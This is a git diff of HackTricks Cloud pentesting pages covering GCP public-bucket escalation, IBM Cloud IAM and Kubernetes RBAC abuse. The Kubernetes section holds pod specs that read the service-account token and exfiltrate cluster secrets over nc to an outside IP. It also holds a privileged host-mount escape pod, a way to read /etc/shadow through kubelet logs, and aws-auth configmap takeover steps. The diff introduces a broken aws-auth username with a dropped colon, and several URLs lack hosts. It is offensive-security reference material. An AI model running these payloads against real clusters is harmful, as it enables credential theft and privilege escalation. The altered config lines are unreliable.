+The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:
+
+- [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute)
+
+**Also the tools** mentioned in:
+
+{{#ref}}
+../
+{{#endref}}
+
+If you find that you can **access a bucket** you might be able to **escalate even further**, check:
+
+{{#ref}}
+gcp-public-buckets-privilege-escalation.md
+{{#endref}}
+
+### Search Open Buckets in Current Account
+
+With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_buckets.sh) you can find all the open buckets:
+
+```bash
+#!/bin/bash
+
+############################
+# Run this tool to find buckets that are open to the public anywhere
+# in your GCP organization.
+#
+# Enjoy!
+############################
+
+for proj in $(gcloud projects list --format="get(projectId)"); do
+    echo "[*] scraping project $proj"
+    for bucket in $(gsutil ls -p $proj); do
+        echo "    $bucket"
+        ACL="$(gsutil iam get $bucket)"
+
+        all_users="$(echo $ACL | grep allUsers)"
+        all_auth="$(echo $ACL | grep allAuthenticatedUsers)"
+
+        if [ -z "$all_users" ]
+        then
+              :
+        else
+              echo "[!] Open to all users: $bucket"
+        fi
+
+        if [ -z "$all_auth" ]
+        then
+              :
+        else
+              echo "[!] Open to all authenticated users: $bucket"
+        fi
+    done
+done
+```
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md
new file mode 100644
index 000000000..2d9f1e2c0
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md
@@ -0,0 +1,31 @@
+# GCP - Public Buckets Privilege Escalation
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Buckets Privilege Escalation
+
+If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access.
+
+### Check Permissions
+
+There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.
+
+However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work.
+
+The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
+
+### Escalating
+
+In order to grant `Storage Admin` to `allAuthenticatedUsers` it's possible to run:
+
+```bash
+gsutil iam ch allAuthenticatedUsers:admin gs://BUCKET_NAME
+```
+
+Another attack would be to **remove the bucket an d recreate it in your account to steal th ownership**.
+
+## References
+
+- [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/ibm-cloud-pentesting/README.md b/src/pentesting-cloud/ibm-cloud-pentesting/README.md
new file mode 100644
index 000000000..1ce69b6e7
--- /dev/null
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/README.md
@@ -0,0 +1,38 @@
+# IBM Cloud Pentesting
+
+## IBM Cloud Pentesting
+
+{{#include ../../banners/hacktricks-training.md}}
+
+### What is IBM cloud? (By chatGPT)
+
+IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud.
+
+When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches:
+
+1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele.
+2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ.
+3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform.
+4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud.
+
+#### Basic Information
+
+For some basic information about IAM and hierarchi check:
+
+{{#ref}}
+ibm-basic-information.md
+{{#endref}}
+
+### SSRF
+
+Learn how you can access the medata endpoint of IBM in the following page:
+
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0
+{{#endref}}
+
+## References
+
+- [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:\~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/)
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md
new file mode 100644
index 000000000..d9e32ea7f
--- /dev/null
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md
@@ -0,0 +1,72 @@
+# IBM - Basic Information
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Hierarchy
+
+IBM Cloud resource model ([from the docs](https://www.ibm.com/blog/announcement/introducing-ibm-cloud-enterprises/)):
+
+

+
+Recommended way to divide projects:
+
+

+
+## IAM
+
+

+
+### Users
+
+Users have an **email** assigned to them. They can access the **IBM console** and also **generate API keys** to use their permissions programatically.\
+**Permissions** can be granted **directly** to the user with an access policy or via an **access group**.
+
+### Trusted Profiles
+
+These are **like the Roles of AWS** or service accounts from GCP. It's possible to **assign them to VM** instances and access their **credentials via metadata**, or even **allow Identity Providers** to use them in order to authenticate users from external platforms.\
+**Permissions** can be granted **directly** to the trusted profile with an access policy or via an **access group**.
+
+### Service IDs
+
+This is another option to allow applications to **interact with IBM cloud** and perform actions. In this case, instead of assign it to a VM or Identity Provider an **API Key can be used** to interact with IBM in a **programatic** way.\
+**Permissions** can be granted **directly** to the service id with an access policy or via an **access group**.
+
+### Identity Providers
+
+External **Identity Providers** can be configured to **access IBM cloud** resources from external platforms by accessing **trusting Trusted Profiles**.
+
+### Access Groups
+
+In the same access group **several users, trusted profiles & service ids** can be present. Each principal in the access group will **inherit the access group permissions**.\
+**Permissions** can be granted **directly** to the trusted profile with an access policy.\
+An **access group cannot be a member** of another access group.
+
+### Roles
+
+A role is a **set of granular permissions**. **A role** is dedicated to **a service**, meaning that it will only contain permissions of that service.\
+**Each service** of IAM will already have some **possible roles** to choose from to **grant a principal access to that service**: **Viewer, Operator, Editor, Administrator** (although there could be more).
+
+Role permissions are given via access policies to principals, so if you need to give for example a **combination of permissions** of a service of **Viewer** and **Administrator**, instead of giving those 2 (and overprivilege a principal), you can **create a new role** for the service and give that new role the **granular permissions you need**.
+
+### Access Policies
+
+Access policies allows to **attach 1 or more roles of 1 service to 1 principal**.\
+When creating the policy you need to choose:
+
+- The **service** where permissions will be granted
+- **Affected resources**
+- Service & Platform **access** that will be granted
+  - These indicate the **permissions** that will be given to the principal to perform actions. If any **custom role** is created in the service you will also be able to choose it here.
+- **Conditions** (if any) to grant the permissions
+
+> [!NOTE]
+> To grant access to several services to a user, you can generate several access policies
+
+

+
+## References
+
+- [https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises](https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises)
+- [https://cloud.ibm.com/docs/account?topic=account-iamoverview](https://cloud.ibm.com/docs/account?topic=account-iamoverview)
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
similarity index 54%
rename from pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
rename to src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
index 074dce60f..0cbc55061 100644
--- a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
@@ -1,19 +1,6 @@
 # IBM - Hyper Protect Crypto Services
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -39,17 +26,4 @@ HSMs can be used for a wide range of applications, including secure online trans
 
 Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
similarity index 62%
rename from pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
rename to src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
index 2c1d42d69..a1d9a8100 100644
--- a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
@@ -1,19 +1,6 @@
 # IBM - Hyper Protect Virtual Server
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -52,17 +39,4 @@ Compared to x64 architecture, which is the most common architecture used in serv
 
 Overall, LinuxONE is a powerful and secure platform that is well-suited for running large-scale, mission-critical workloads that require high levels of performance and reliability. While x64 architecture has its own advantages, it may not be able to provide the same level of scalability, security, and reliability as LinuxONE for certain workloads.\\
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/kubernetes-security/README.md b/src/pentesting-cloud/kubernetes-security/README.md
new file mode 100644
index 000000000..c903d3209
--- /dev/null
+++ b/src/pentesting-cloud/kubernetes-security/README.md
@@ -0,0 +1,80 @@
+# Kubernetes Pentesting
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Kubernetes Basics
+
+If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes:
+
+{{#ref}}
+kubernetes-basics.md
+{{#endref}}
+
+### Labs to practice and learn
+
+- [https://securekubernetes.com/](https://securekubernetes.com)
+- [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)
+
+## Hardening Kubernetes / Automatic Tools
+
+{{#ref}}
+kubernetes-hardening/
+{{#endref}}
+
+## Manual Kubernetes Pentest
+
+### From the Outside
+
+There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there.
+
+Depending on the configuration and your privileges you might be able to abuse that environment, for more information:
+
+{{#ref}}
+pentesting-kubernetes-services/
+{{#endref}}
+
+### Enumeration inside a Pod
+
+If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**:
+
+{{#ref}}
+attacking-kubernetes-from-inside-a-pod.md
+{{#endref}}
+
+### Enumerating Kubernetes with Credentials
+
+You might have managed to compromise **user credentials, a user token or some service account toke**n. You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it:
+
+{{#ref}}
+kubernetes-enumeration.md
+{{#endref}}
+
+Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. If you want to abuse permissions, you first should read about it here:
+
+{{#ref}}
+kubernetes-role-based-access-control-rbac.md
+{{#endref}}
+
+#### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with:
+
+{{#ref}}
+abusing-roles-clusterroles-in-kubernetes/
+{{#endref}}
+
+### Privesc to a different Namespace
+
+If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources:
+
+{{#ref}}
+kubernetes-namespace-escalation.md
+{{#endref}}
+
+### From Kubernetes to the Cloud
+
+If you have compromised a K8s account or a pod, you might be able able to move to other clouds. This is because in clouds like AWS or GCP is possible to **give a K8s SA permissions over the cloud**.
+
+{{#ref}}
+kubernetes-pivoting-to-clouds.md
+{{#endref}}
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
similarity index 71%
rename from pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
rename to src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
index 20df0a56f..9cc723a9a 100644
--- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
+++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
@@ -1,19 +1,6 @@
 # Abusing Roles/ClusterRoles in Kubernetes
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 Here you can find some potentially dangerous Roles and ClusterRoles configurations.\
 Remember that you can get all the supported resources with `kubectl api-resources`
@@ -22,11 +9,11 @@ Remember that you can get all the supported resources with `kubectl api-resource
 
 Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**:
 
-* Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds
-* Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds
-* Be able to **read secrets** as the SAs tokens are stored as secrets
-* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
-* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
+- Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds
+- Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds
+- Be able to **read secrets** as the SAs tokens are stored as secrets
+- Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
+- A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
 
 ### Access Any Resource or Verb (Wildcard)
 
@@ -78,10 +65,14 @@ metadata:
   namespace: kube-system
 spec:
   containers:
-  - name: alpine
-    image: alpine
-    command: ["/bin/sh"]
-    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
+    - name: alpine
+      image: alpine
+      command: ["/bin/sh"]
+      args:
+        [
+          "-c",
+          'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000',
+        ]
   serviceAccountName: bootstrap-signer
   automountServiceAccountToken: true
   hostNetwork: true
@@ -91,13 +82,12 @@ spec:
 
 The following indicates all the privileges a container can have:
 
-* **Privileged access** (disabling protections and setting capabilities)
-* **Disable namespaces hostIPC and hostPid** that can help to escalate privileges
-* **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks
-* **Mount hosts / inside the container**
+- **Privileged access** (disabling protections and setting capabilities)
+- **Disable namespaces hostIPC and hostPid** that can help to escalate privileges
+- **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks
+- **Mount hosts / inside the container**
 
-{% code title="super_privs.yaml" %}
-```yaml
+```yaml:super_privs.yaml
 apiVersion: v1
 kind: Pod
 metadata:
@@ -108,31 +98,30 @@ spec:
   # Uncomment and specify a specific node you want to debug
   # nodeName: 
   containers:
-  - image: ubuntu
-    command:
-      - "sleep"
-      - "3600" # adjust this as needed -- use only as long as you need
-    imagePullPolicy: IfNotPresent
-    name: ubuntu
-    securityContext:
-      allowPrivilegeEscalation: true
-      privileged: true
-      #capabilities:
-      #  add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
-      runAsUser: 0 # run as root (or any other user)
-    volumeMounts:
-    - mountPath: /host
-      name: host-volume
+    - image: ubuntu
+      command:
+        - "sleep"
+        - "3600" # adjust this as needed -- use only as long as you need
+      imagePullPolicy: IfNotPresent
+      name: ubuntu
+      securityContext:
+        allowPrivilegeEscalation: true
+        privileged: true
+        #capabilities:
+        #  add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
+        runAsUser: 0 # run as root (or any other user)
+      volumeMounts:
+        - mountPath: /host
+          name: host-volume
   restartPolicy: Never # we want to be intentional about running this pod
   hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
   hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
   hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_
   volumes:
-  - name: host-volume
-    hostPath:
-      path: /
+    - name: host-volume
+      hostPath:
+        path: /
 ```
-{% endcode %}
 
 Create the pod with:
 
@@ -152,12 +141,12 @@ Now that you can escape to the node check post-exploitation techniques in:
 
 You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template:
 
-* **Privileged + hostPID**
-* **Privileged only**
-* **hostPath**
-* **hostPID**
-* **hostNetwork**
-* **hostIPC**
+- **Privileged + hostPID**
+- **Privileged only**
+- **hostPath**
+- **hostPID**
+- **hostNetwork**
+- **hostIPC**
 
 _You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)
 
@@ -168,9 +157,9 @@ Moreover, if you can create a **pod with the host network namespace** you can **
 
 For more information check:
 
-{% content-ref url="pod-escape-privileges.md" %}
-[pod-escape-privileges.md](pod-escape-privileges.md)
-{% endcontent-ref %}
+{{#ref}}
+pod-escape-privileges.md
+{{#endref}}
 
 ### **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
 
@@ -197,17 +186,21 @@ spec:
       automountServiceAccountToken: true
       hostNetwork: true
       containers:
-      - name: alpine
-        image: alpine
-        command: ["/bin/sh"]
-        args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
-        volumeMounts:
-        - mountPath: /root
-          name: mount-node-root
+        - name: alpine
+          image: alpine
+          command: ["/bin/sh"]
+          args:
+            [
+              "-c",
+              'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000',
+            ]
+          volumeMounts:
+            - mountPath: /root
+              name: mount-node-root
       volumes:
-      - name: mount-node-root
-        hostPath:
-          path: /
+        - name: mount-node-root
+          hostPath:
+            path: /
 ```
 
 ### **Pods Exec**
@@ -236,7 +229,7 @@ The Kubelet service exposes the `/logs/` endpoint which is just basically **expo
 
 Therefore, an attacker with **access to write in the /var/log/ folder** of the container could abuse this behaviours in 2 ways:
 
-* Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. Then, you will be able to exfiltrate hosts shadow file doing:
+- Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. Then, you will be able to exfiltrate hosts shadow file doing:
 
 ```bash
 kubectl logs escaper
@@ -246,7 +239,7 @@ failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\
 # Keep incrementing tail to exfiltrate the whole file
 ```
 
-* If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files).
+- If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files).
 
 ```bash
 curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/'
@@ -286,46 +279,46 @@ Which was meant to prevent escapes like the previous ones by, instead of using a
 apiVersion: v1
 kind: PersistentVolume
 metadata:
-    name: task-pv-volume-vol
-    labels:
-      type: local
+  name: task-pv-volume-vol
+  labels:
+    type: local
 spec:
-    storageClassName: manual
-    capacity:
-      storage: 10Gi
-    accessModes:
-      - ReadWriteOnce
-    hostPath:
-      path: "/var/log"
+  storageClassName: manual
+  capacity:
+    storage: 10Gi
+  accessModes:
+    - ReadWriteOnce
+  hostPath:
+    path: "/var/log"
 ---
 apiVersion: v1
 kind: PersistentVolumeClaim
 metadata:
-    name: task-pv-claim-vol
+  name: task-pv-claim-vol
 spec:
-    storageClassName: manual
-    accessModes:
-      - ReadWriteOnce
-    resources:
-      requests:
-        storage: 3Gi
+  storageClassName: manual
+  accessModes:
+    - ReadWriteOnce
+  resources:
+    requests:
+      storage: 3Gi
 ---
 apiVersion: v1
 kind: Pod
 metadata:
-    name: task-pv-pod
+  name: task-pv-pod
 spec:
-    volumes:
-      - name: task-pv-storage-vol
-        persistentVolumeClaim:
-          claimName: task-pv-claim-vol
-    containers:
-      - name: task-pv-container
-        image: ubuntu:latest
-        command: [ "sh", "-c", "sleep 1h" ]
-        volumeMounts:
-          - mountPath: "/hostlogs"
-            name: task-pv-storage-vol
+  volumes:
+    - name: task-pv-storage-vol
+      persistentVolumeClaim:
+        claimName: task-pv-claim-vol
+  containers:
+    - name: task-pv-container
+      image: ubuntu:latest
+      command: ["sh", "-c", "sleep 1h"]
+      volumeMounts:
+        - mountPath: "/hostlogs"
+          name: task-pv-storage-vol
 ```
 
 ### **Impersonating privileged accounts**
@@ -343,7 +336,7 @@ Or use the REST API:
 
 ```bash
 curl -k -v -XGET -H "Authorization: Bearer " \
--H "Impersonate-Group: system:masters"\ 
+-H "Impersonate-Group: system:masters"\
 -H "Impersonate-User: null" \
 -H "Accept: application/json" \
 https://:/api/v1/namespaces/kube-system/secrets/
@@ -377,29 +370,29 @@ kind: ClusterRole
 metadata:
   name: csr-approver
 rules:
-- apiGroups:
-  - certificates.k8s.io
-  resources:
-  - certificatesigningrequests
-  verbs:
-  - get
-  - list
-  - watch
-  - create
-- apiGroups:
-  - certificates.k8s.io
-  resources:
-  - certificatesigningrequests/approval
-  verbs:
-  - update
-- apiGroups:
-  - certificates.k8s.io
-  resources:
-  - signers
-  resourceNames:
-  - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain
-  verbs:
-  - approve
+  - apiGroups:
+      - certificates.k8s.io
+    resources:
+      - certificatesigningrequests
+    verbs:
+      - get
+      - list
+      - watch
+      - create
+  - apiGroups:
+      - certificates.k8s.io
+    resources:
+      - certificatesigningrequests/approval
+    verbs:
+      - update
+  - apiGroups:
+      - certificates.k8s.io
+    resources:
+      - signers
+    resourceNames:
+      - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain
+    verbs:
+      - approve
 ```
 
 So, with the new node CSR approved, you can **abuse** the special permissions of nodes to **steal secrets** and **escalate privileges**.
@@ -418,7 +411,6 @@ The way to bypass this is just to **create a node credentials for the node name
 Principals that can modify **`configmaps`** in the kube-system namespace on EKS (need to be in AWS) clusters can obtain cluster admin privileges by overwriting the **aws-auth** configmap.\
 The verbs needed are **`update`** and **`patch`**, or **`create`** if configmap wasn't created:
 
-{% code overflow="wrap" %}
 ```bash
 # Check if config map exists
 get configmap aws-auth -n kube-system -o yaml
@@ -432,7 +424,7 @@ metadata:
 data:
   mapRoles: |
     - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
-      username: system:node:{{EC2PrivateDNSName}}
+      username: system:node{{EC2PrivateDNSName}}
       groups:
         - system:masters
 
@@ -448,7 +440,7 @@ kubectl edit -n kube-system configmap/aws-auth
 data:
   mapRoles: |
     - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
-      username: system:node:{{EC2PrivateDNSName}}
